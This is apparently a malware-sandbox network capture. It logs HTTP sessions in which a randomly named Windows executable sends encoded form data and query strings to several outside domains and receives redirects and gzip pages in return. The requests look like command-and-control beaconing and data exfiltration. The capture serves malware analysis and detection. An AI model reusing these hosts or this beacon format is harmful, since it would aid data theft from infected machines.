                            Data Ascii: UbV=6u088QLC2cDQv/Spia3qIu2UOHNJKJ1J9ZIfMpDPOMm5iD/yY1y4suZ1567qTUERxc7yCF9oPOqJcxDW9L0JJ4eN4HQCzhiO0FOmX2Ex51maqW5CqjuxN8+C8AkHNsykb+SHkO3qv4jOnMMuBCDDYOsufZxGo612ZFwwDz9dXiyw97BQ40cz50C3+vnE24o0lGEozBMQNffHdNZnpgNA0Eg8P6wy+lHa8aGeevHqN2RFAYkVk6OZD53dUY6t+LuWb5uPc6PoN4MBtGxckqwonUtx9VS6G7pik7xmC6CWfX5PipB+aF2ooybEy0WC8mzOU/coVrybjqu7f14+Dpv9aJ73Twb7EfThQO8LvwAHJMon64g5SmNzbhYECmKn+mcrgFGzNAE8+xtY/utAG6N3p+gbm2D9/hc8bUmqrs9xLzfmVm7GeqY3b4q3YNExP6Ri/q4YbNnN5o0iZbDCaqO0tmgdZ6DicHpc2ekS4/fJUp2xhsNJSldUNKqNPxwyTuJZ1RW/0cJskhkaKqeXvAUBKzGUEZQtQbNXq+VMoj/yzEtr3fxoxeghfV7mxk0WhwLvwqefsW+fjJfeyBPwZZq4LtHmr2PAkbEsB1Wr1L6bvkCHNStDuF24kOAEWLjSOwedNQd6X5bh+Bh5mc0hkaQSrXIyMY0R+uUw18HuNI7o3rDH0EXP5g5Qs9sJRJXCwgfa7Jj8YPa2eK7rlWj/2plx3UxW0BJrBZ5VLS3A3Q8FVZm9Ws6IZG4rN7K63dV7Bk1BBoeWd+ao/Gkku0rZOXiYHHGVTWKc5AW3NpG/zowTPNlcOlRl+Zx33O0AM6By0pATLxyNUbpGqS/9/KpzZhjFkf5uBVVVRu+GulMvdQ6khcdGSxhHehuXtJ48E8F4b6ePy1u7XBt/7rFNA3VMWbpTDewnjqFV/FVZAgwQW9Sy9uG3gEbsO1d5Oad9eSKqE2f0io4eMlpQ2SxkRK+fh5tpwT0Umvi7+vPjCnZPBb3pXvpVv2se [TRUNCATED]


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            12192.168.2.4497493.33.130.190801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:22:42.658550024 CEST366OUTGET /f6em/?UbV=3scc/l+m0dTfturexYmDD/ihdyc/GZ5DxLslLbTADZTZz0L4ImmnnfNh8/fEKVgbyf/SBi86BZffcRTKk/E5LLaY5QN8jxf/mVG9V1ZF+n+osgl4kzW2NMc=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.bearclaw.bot
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:22:43.121315956 CEST395INHTTP/1.1 200 OK
                            Server: openresty
                            Date: Tue, 16 Jul 2024 05:22:43 GMT
                            Content-Type: text/html
                            Content-Length: 255
                            Connection: close
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 55 62 56 3d 33 73 63 63 2f 6c 2b 6d 30 64 54 66 74 75 72 65 78 59 6d 44 44 2f 69 68 64 79 63 2f 47 5a 35 44 78 4c 73 6c 4c 62 54 41 44 5a 54 5a 7a 30 4c 34 49 6d 6d 6e 6e 66 4e 68 38 2f 66 45 4b 56 67 62 79 66 2f 53 42 69 38 36 42 5a 66 66 63 52 54 4b 6b 2f 45 35 4c 4c 61 59 35 51 4e 38 6a 78 66 2f 6d 56 47 39 56 31 5a 46 2b 6e 2b 6f 73 67 6c 34 6b 7a 57 32 4e 4d 63 3d 26 59 34 67 70 3d 6d 6c 6c 74 63 72 52 78 63 4c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?UbV=3scc/l+m0dTfturexYmDD/ihdyc/GZ5DxLslLbTADZTZz0L4ImmnnfNh8/fEKVgbyf/SBi86BZffcRTKk/E5LLaY5QN8jxf/mVG9V1ZF+n+osgl4kzW2NMc=&Y4gp=mlltcrRxcL"}</script></head></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            13192.168.2.449750212.227.172.254801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:22:48.154267073 CEST649OUTPOST /rbwl/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.focusonsocials.com
                            Origin: http://www.focusonsocials.com
                            Referer: http://www.focusonsocials.com/rbwl/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 2f 46 4f 61 64 53 64 4d 58 76 50 4f 73 37 6d 33 65 78 67 54 7a 68 42 31 44 32 37 42 64 4c 4f 36 6a 44 6f 72 61 62 4a 2b 65 30 4c 64 35 4b 79 76 32 70 33 49 74 42 55 63 4e 33 56 39 66 78 47 47 59 79 61 58 49 6a 4b 43 64 4d 6e 37 7a 30 72 57 6d 4b 53 59 63 68 62 48 4f 71 36 4f 51 66 2b 46 38 43 6b 78 5a 77 44 47 47 77 6a 30 45 66 4f 68 4c 55 2b 65 37 6a 2f 48 2f 52 33 45 5a 34 49 70 64 57 73 33 47 65 65 64 62 6c 41 77 49 69 74 57 5a 71 56 42 57 44 6c 6d 30 49 55 47 2b 66 69 4a 35 69 41 61 58 4d 36 55 2b 67 41 4d 7a 4d 62 70 70 55 66 2b 2b 54 57 6f 48 62 78 34 50 64 6f 66 4c 67 3d 3d
                            Data Ascii: UbV=/FOadSdMXvPOs7m3exgTzhB1D27BdLO6jDorabJ+e0Ld5Kyv2p3ItBUcN3V9fxGGYyaXIjKCdMn7z0rWmKSYchbHOq6OQf+F8CkxZwDGGwj0EfOhLU+e7j/H/R3EZ4IpdWs3GeedblAwIitWZqVBWDlm0IUG+fiJ5iAaXM6U+gAMzMbppUf++TWoHbx4PdofLg==
                            Jul 16, 2024 07:22:48.798825026 CEST430INHTTP/1.1 301 Moved Permanently
                            Server: nginx
                            Date: Tue, 16 Jul 2024 05:22:48 GMT
                            Content-Type: text/html
                            Content-Length: 162
                            Connection: close
                            Location: https://www.focusonsocials.com/rbwl/
                            Expires: Tue, 16 Jul 2024 05:42:48 GMT
                            Cache-Control: max-age=1200
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            14192.168.2.449751212.227.172.254801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:22:50.684969902 CEST669OUTPOST /rbwl/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 220
                            Cache-Control: max-age=0
                            Host: www.focusonsocials.com
                            Origin: http://www.focusonsocials.com
                            Referer: http://www.focusonsocials.com/rbwl/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 2f 46 4f 61 64 53 64 4d 58 76 50 4f 74 61 32 33 53 7a 49 54 69 52 42 32 50 57 37 42 45 62 4f 2b 6a 44 6b 72 61 61 4e 75 65 47 76 64 2b 6f 61 76 33 6f 33 49 73 42 55 63 56 6e 56 43 53 52 47 64 59 79 65 68 49 6a 32 43 64 4d 62 37 7a 31 62 57 6d 35 36 62 64 78 62 46 44 4b 36 32 65 2f 2b 46 38 43 6b 78 5a 77 48 67 47 30 50 30 48 73 57 68 4b 32 57 66 32 44 2f 45 34 52 33 45 64 34 4a 75 64 57 74 69 47 62 47 7a 62 6e 34 77 49 67 31 57 5a 37 56 43 63 44 6c 6b 71 34 56 75 36 39 37 32 32 53 4e 53 52 66 50 77 77 6a 63 4a 32 4b 4b 7a 34 6c 2b 70 73 54 79 62 61 63 34 4d 43 65 56 57 51 68 46 35 6a 64 5a 4d 4e 48 6e 33 6a 44 6a 45 79 57 50 46 71 4d 30 3d
                            Data Ascii: UbV=/FOadSdMXvPOta23SzITiRB2PW7BEbO+jDkraaNueGvd+oav3o3IsBUcVnVCSRGdYyehIj2CdMb7z1bWm56bdxbFDK62e/+F8CkxZwHgG0P0HsWhK2Wf2D/E4R3Ed4JudWtiGbGzbn4wIg1WZ7VCcDlkq4Vu69722SNSRfPwwjcJ2KKz4l+psTybac4MCeVWQhF5jdZMNHn3jDjEyWPFqM0=
                            Jul 16, 2024 07:22:51.327538967 CEST430INHTTP/1.1 301 Moved Permanently
                            Server: nginx
                            Date: Tue, 16 Jul 2024 05:22:51 GMT
                            Content-Type: text/html
                            Content-Length: 162
                            Connection: close
                            Location: https://www.focusonsocials.com/rbwl/
                            Expires: Tue, 16 Jul 2024 05:42:51 GMT
                            Cache-Control: max-age=1200
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            15192.168.2.449752212.227.172.254801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:22:53.221884966 CEST10751OUTPOST /rbwl/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 10300
                            Cache-Control: max-age=0
                            Host: www.focusonsocials.com
                            Origin: http://www.focusonsocials.com
                            Referer: http://www.focusonsocials.com/rbwl/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 2f 46 4f 61 64 53 64 4d 58 76 50 4f 74 61 32 33 53 7a 49 54 69 52 42 32 50 57 37 42 45 62 4f 2b 6a 44 6b 72 61 61 4e 75 65 47 6e 64 2b 62 69 76 32 4c 76 49 39 78 55 63 4c 33 56 35 53 52 48 50 59 79 6d 39 49 6a 36 53 64 4a 58 37 7a 57 54 57 67 49 36 62 45 68 62 46 66 36 36 4e 51 66 2b 71 38 43 30 31 5a 77 58 67 47 30 50 30 48 70 61 68 4a 6b 2b 66 30 44 2f 48 2f 52 33 41 5a 34 4a 4b 64 57 30 5a 47 62 79 4e 62 55 77 77 4c 41 6c 57 61 4a 74 43 51 44 6c 69 72 34 56 32 36 39 48 58 32 53 42 30 52 66 4b 56 77 6b 30 4a 30 4e 4c 48 68 32 76 2b 36 77 7a 64 5a 39 67 5a 44 4d 52 6d 52 47 64 66 6b 66 42 53 4e 56 6e 75 67 6b 57 68 33 6e 65 50 7a 35 34 76 57 71 35 58 78 76 41 78 57 44 7a 44 64 2b 71 6b 34 37 68 6c 54 79 6a 54 30 63 4d 31 70 38 33 69 33 61 6f 31 4b 66 47 48 36 45 71 31 76 53 45 44 4a 34 65 74 5a 37 34 6a 4e 38 4d 78 43 37 62 64 47 61 6f 4c 46 68 57 34 64 49 6f 76 54 4f 37 77 63 2b 79 62 4e 57 58 69 65 2b 4a 36 65 64 5a 7a 64 73 34 4b 7a 34 38 44 52 44 34 38 61 4d 65 4c 48 65 43 62 77 79 [TRUNCATED]
                            Data Ascii: UbV=/FOadSdMXvPOta23SzITiRB2PW7BEbO+jDkraaNueGnd+biv2LvI9xUcL3V5SRHPYym9Ij6SdJX7zWTWgI6bEhbFf66NQf+q8C01ZwXgG0P0HpahJk+f0D/H/R3AZ4JKdW0ZGbyNbUwwLAlWaJtCQDlir4V269HX2SB0RfKVwk0J0NLHh2v+6wzdZ9gZDMRmRGdfkfBSNVnugkWh3nePz54vWq5XxvAxWDzDd+qk47hlTyjT0cM1p83i3ao1KfGH6Eq1vSEDJ4etZ74jN8MxC7bdGaoLFhW4dIovTO7wc+ybNWXie+J6edZzds4Kz48DRD48aMeLHeCbwyWNaAng90qO2pl5hfl7RyctJU/MnxFvMLUz7FtrGAuszcPuyn7k/L5ezXVDktaim+LBqqWf/t9LGp50ff2vkyaxOG/CUcXszySG87MIhp8IE4nzrOyIWjCv+ZsIY8a7zyzqOYkJjc3f1hPzTgCGdQp1vsdColbqU8ZlrOtK7m9t37iJU/v7BzDNp0Gc02jPM9qOZfoq2T2vnN7iGsLs3eFMXXxFTbTHXF406l86P6E9kX9q1Of1y2aqtGaQDF1KkR4tWUKSfup2vvUIRZkumf4jftYz2u4Mup26/PtKGP+tJBpVziUbJVTvXiSJ3jUkul+hzpxqczijexrlYADlty22rB21iQ21ksDwGH2IL20roViJg2zXJkijOHqgm4BBNkG4Xl2+92JdSMDr9SYZP0V9v7rFv8d95a2+rj+OIY9uDyrWBU+ID+SeMB76qDD54A5ySO4h/ArMgT/bzm7mxYDQR9Y2VUFuvc4uUtOG0Swu9pZvNWOj8B2EF8u8f1ocjEPv9Zno9nfQ6plxSuEkefFb8bUK/1CPduZGucDdn+xSvXHxvlC4o9nKS+GlTgUAsGRGT+vQJfVKRfkvrd9HOxVFSKYKK51ouDB4z9yyOmL3Jesg0cc1UwsA6qpiTFU4CYu6rRPbkpCxatbWQtYXG/JOmG0iPMmHt5g6 [TRUNCATED]
                            Jul 16, 2024 07:22:53.857085943 CEST430INHTTP/1.1 301 Moved Permanently
                            Server: nginx
                            Date: Tue, 16 Jul 2024 05:22:53 GMT
                            Content-Type: text/html
                            Content-Length: 162
                            Connection: close
                            Location: https://www.focusonsocials.com/rbwl/
                            Expires: Tue, 16 Jul 2024 05:42:53 GMT
                            Cache-Control: max-age=1200
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            16192.168.2.449753212.227.172.254801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:22:55.764309883 CEST372OUTGET /rbwl/?UbV=yHm6enFIYs/ovpirZiNA1kNGPi3kBJu5kTNDWZFxfmq4+4eFgr/++B8wLRVxCj6ZcFesL3DTSsX/73fVlamlaT/sJduaX9mgiTgnUifyDkvpJfWGHGD/zyQ=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.focusonsocials.com
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:22:56.388250113 CEST571INHTTP/1.1 301 Moved Permanently
                            Server: nginx
                            Date: Tue, 16 Jul 2024 05:22:56 GMT
                            Content-Type: text/html
                            Content-Length: 162
                            Connection: close
                            Location: https://www.focusonsocials.com/rbwl/?UbV=yHm6enFIYs/ovpirZiNA1kNGPi3kBJu5kTNDWZFxfmq4+4eFgr/++B8wLRVxCj6ZcFesL3DTSsX/73fVlamlaT/sJduaX9mgiTgnUifyDkvpJfWGHGD/zyQ=&Y4gp=mlltcrRxcL
                            Expires: Tue, 16 Jul 2024 05:42:56 GMT
                            Cache-Control: max-age=1200
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            17192.168.2.44975443.157.128.107801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:23:02.071733952 CEST634OUTPOST /pgto/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.onlandtoy.com
                            Origin: http://www.onlandtoy.com
                            Referer: http://www.onlandtoy.com/pgto/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 4a 35 49 70 54 63 62 30 4c 6e 65 38 55 64 59 37 71 63 42 72 4a 76 33 72 7a 6e 55 72 6a 32 6a 2b 35 4d 37 75 32 35 5a 4c 5a 70 6b 48 68 69 48 6e 35 42 42 73 63 49 50 63 6b 39 55 78 4b 44 75 63 30 34 53 2f 56 69 72 36 73 32 77 76 42 61 77 65 67 76 54 6b 6a 49 59 4a 4f 2f 59 74 48 65 52 34 6f 4f 43 4e 69 44 6e 32 79 31 4e 77 35 63 61 45 2b 6a 31 6f 62 32 65 72 32 4d 48 45 61 6c 72 53 64 4e 59 39 64 51 71 7a 78 6f 46 31 6f 4f 79 75 46 72 41 68 77 41 61 56 4c 51 67 73 57 65 56 6c 78 79 6e 49 62 54 33 74 52 55 4f 52 63 71 45 47 35 7a 71 6a 39 74 49 63 74 75 69 47 45 6d 48 66 49 67 3d 3d
                            Data Ascii: UbV=J5IpTcb0Lne8UdY7qcBrJv3rznUrj2j+5M7u25ZLZpkHhiHn5BBscIPck9UxKDuc04S/Vir6s2wvBawegvTkjIYJO/YtHeR4oOCNiDn2y1Nw5caE+j1ob2er2MHEalrSdNY9dQqzxoF1oOyuFrAhwAaVLQgsWeVlxynIbT3tRUORcqEG5zqj9tIctuiGEmHfIg==
                            Jul 16, 2024 07:23:03.163319111 CEST1236INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Tue, 16 Jul 2024 05:23:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Vary: Accept-Encoding
                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                            Cache-Control: no-cache, must-revalidate, max-age=0
                            Link: <http://www.onlandtoy.com/wp-json/>; rel="https://api.w.org/"
                            Content-Encoding: gzip
                            Data Raw: 33 33 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 7b 93 23 c9 71 df df bb 9f a2 17 1b dc 01 ee f0 6a bc 66 06 b3 18 ea 6e ef 4e 3c 9b a7 63 70 ef 28 cb b7 17 1b 0d 74 63 d0 b7 00 1a ec 6e cc ec dc 70 22 24 85 64 93 96 64 cb 96 65 3b 64 32 6c 32 68 8b 21 85 48 86 65 85 64 5a a2 3e 8c ef b1 fc cb 5f c1 bf cc aa ee ae ee ae 06 1a 98 b9 3b 8b a1 7d 60 06 dd 55 99 59 59 59 59 99 59 59 55 0f ef bd f6 f6 a3 77 7e e3 6b af 1b b3 70 31 3f bd fb 90 7e 18 73 6b 79 36 aa 7c 38 6b 3c fa b5 0a 3d 73 2c fb f4 ee 9d 87 0b 27 b4 8c c9 cc f2 03 27 1c 55 de 7d e7 8d c6 51 c5 68 c5 6f 96 d6 c2 19 55 ce 5d e7 62 e5 f9 61 c5 98 78 cb d0 59 a2 e4 85 6b 87 b3 91 ed 9c bb 13 a7 c1 5f ea 86 bb 74 43 d7 9a 37 82 89 35 77 46 26 c3 11 08 18 cc 81 ef 8d bd 30 38 88 81 1c 2c ac e7 0d 77 61 9d 39 8d 95 0f 48 ce c5 70 6e f9 67 ce 01 57 0c dd 70 ee 9c 7e f2 dd 3f fb e4 3b 3f ff f8 db 3f fd c5 f7 ff ea 17 df fb 81 f1 e0 fe 51 c7 34 4f 8c 0b cf b7 51 29 08 1e b6 44 c1 bb 0f e7 ee f2 99 e1 3b f3 d1 81 bd 0c 08 e2 d4 09 27 b3 03 63 [TRUNCATED]
                            Data Ascii: 339a}{#qjfnN<cp(tcnp"$dde;d2l2h!HedZ>_;}`UYYYYYYUw~kp1?~sky6|8k<=s,''U}QhoU]baxYk_tC75wF&08,wa9HpngWp~?;??Q4OQ)D;'cFE[v]6'BUyK+t*FxBjN-?^~D|kxqVjAPKpG@%$*<{.mb,NW8&=iqOZwo'V^q\-%8?*24|]o[2@HiL?r2_D\9r]6?|ATO^g3sc?u5m{o^NHpn}Y:|u$znLN*/]8+c8Az.XKxkskvVk'd71|D^<~Ae5]_WU MLj<<3=5<@3!k'D2v^}4@Ihn(X#%T-jj'6e
                            Jul 16, 2024 07:23:03.163382053 CEST224INData Raw: 35 ee 57 b0 af 76 25 5f 3a a3 d1 c8 7f 2f 7c ff ba 96 30 78 1d 31 38 b8 70 89 fd 28 3d 81 44 55 a6 73 eb ac 32 94 15 97 28 54 79 b2 b6 8f ba 13 7c 4e a7 dd 27 eb a9 d3 9e 3e 59 77 da 6d 1b 9f 03 eb 50 3c 81 80 17 14 1b a7 8a d5 be 7c cf 1c de 4b
                            Data Ascii: 5Wv%_:/|0x18p(=DUs2(Ty|N'>YwmP<|KV\vUPD@jd@L=@S{GN-X^y'@ytu@JKq{Zq^%3i4(QepoD75~95<V
                            Jul 16, 2024 07:23:03.163415909 CEST1236INData Raw: 07 81 33 9f 62 fa c4 78 5f 4e b4 45 be 4c f2 fc f6 74 0a 55 ed 38 cb 47 3c 40 ab dd 76 bb 6e f6 db b5 a1 db c4 63 28 88 d7 e7 0e 29 f7 6a 45 8c e0 4a ad 6e 8d 7c 1a 86 8f 68 da c6 80 ad 74 ec 4a fd ea 02 e3 f7 eb 98 ff df f0 9d 6f ae 51 7e 7e 39
                            Data Ascii: 3bx_NELtU8G<@vnc()jEJn|htJoQ~~9QjRW$NBoU[)*vvVW|Lt('v?V!BRGBq:+ldn,&ffgi?sZz:=6{bDbz)Uq01K
                            Jul 16, 2024 07:23:03.163578987 CEST1236INData Raw: 78 8f 5b f0 d2 e8 02 1a 85 a8 5e 78 b6 f3 fe f0 02 1a c6 a9 46 ef 60 4c 87 88 a7 cd 1b 73 ff fd 5a 3d 0f 87 15 ca 4e 80 fc 39 01 12 1c b8 39 41 39 38 fb 12 24 3a e0 e6 04 e5 e0 ec 4b 90 e8 ff 9b 13 94 83 b3 2f 41 42 fc 6e 4e 50 0e ce be 04 09 e9
                            Data Ascii: x[^xF`LsZ=N99A98$:K/ABnNP9A98t{!lywbKnl8v`L;XD<a6atG>b^:1esS7&k2D+3}+ALymzGvxo9O~00cbsy=
                            Jul 16, 2024 07:23:03.163615942 CEST1236INData Raw: 15 02 89 34 bb 32 45 b7 d7 fc ad d3 a3 c2 74 03 ca 3e 3f ea 95 58 b4 96 99 a9 49 52 fa 09 e4 24 24 90 de a3 cc 12 11 9f 1e b1 fc bd 9f 03 94 1f 69 c2 6a 29 9a 32 32 a3 5c d8 c0 0c 7b 4b 38 58 0d de 92 e5 57 10 6f 2e 13 f2 7c fa 54 cc e4 91 8a 11
                            Data Ascii: 42Et>?XIR$$ij)22\{K8XWo.|T!Y6d[A}yP[,M6Rn#yidM;'j4L&0e"-A#rdyHpk?X0~>>':'D/MX~s>f;i?yGv"fp5
                            Jul 16, 2024 07:23:03.163650990 CEST1236INData Raw: 68 bb 02 8d c3 35 6a 29 11 bf b9 0f eb 8b d4 b1 fb a1 35 c6 10 84 93 89 4d 56 8d 40 a4 c9 65 e2 22 6a 9e 24 ef 59 42 5a 29 c5 c9 39 5d af 21 52 da 5c c8 3f d3 93 cd 84 53 cd cd 6c 05 69 58 66 ab 44 d6 65 b6 b8 68 4a b6 34 23 60 5b 32 5b 9e d7 ec
                            Data Ascii: h5j)5MV@e"j$YBZ)9]!R\?SliXfDehJ4#`[2[c2GXuS:K0B'$}`76+k'y!OBa#E.{&DG5E:eh.2tmH)*VWuTI%s"c$Y)<Q3yzji\GFKKx
                            Jul 16, 2024 07:23:03.164231062 CEST896INData Raw: 85 79 c3 e3 27 16 0b 8e a6 14 cd ec b1 54 1c 6d 06 2c a5 62 0f c0 c7 9b 01 4b a9 d8 03 30 96 8d 36 f7 9e 10 8b 7d 20 6f 19 7b af 0a b9 d8 07 f2 96 c1 27 05 63 1b 64 25 92 ca 7b 3f 28 d7 e7 98 52 7d d2 dd ac 14 a3 4c 18 9a ad 4d ec 9b d8 58 90 23
                            Data Ascii: y'Tm,bK06} o{'cd%{?(R}LMX#CbU5][G5xV#jKppX2G:+kE\9Z xU,aHvX|jaY'&UFhD|}7rsJr7xddp{0bC17u-kK4ul
                            Jul 16, 2024 07:23:03.164268017 CEST1236INData Raw: 21 bb de 6d 88 37 19 60 bc f4 19 c9 bc a4 50 3c 53 d3 57 15 fd 4b cc 7f 29 51 05 32 0d 4c 64 dd 63 37 29 59 11 11 38 f1 0e 4b ec b0 d1 d1 64 25 1d 36 03 4f 6e 99 9e d0 91 85 ea ef 05 68 b6 00 c3 c2 19 16 2a 19 56 f2 6b 16 54 4c 95 9c c1 84 f7 20
                            Data Ascii: !m7`P<SWK)Q2Ldc7)Y8Kd%6Onh*VkTL U )t7)|z4n\`qpih[a%B6MTgADYFY*Eb)X'!&ED),58+Z)"IDM/5
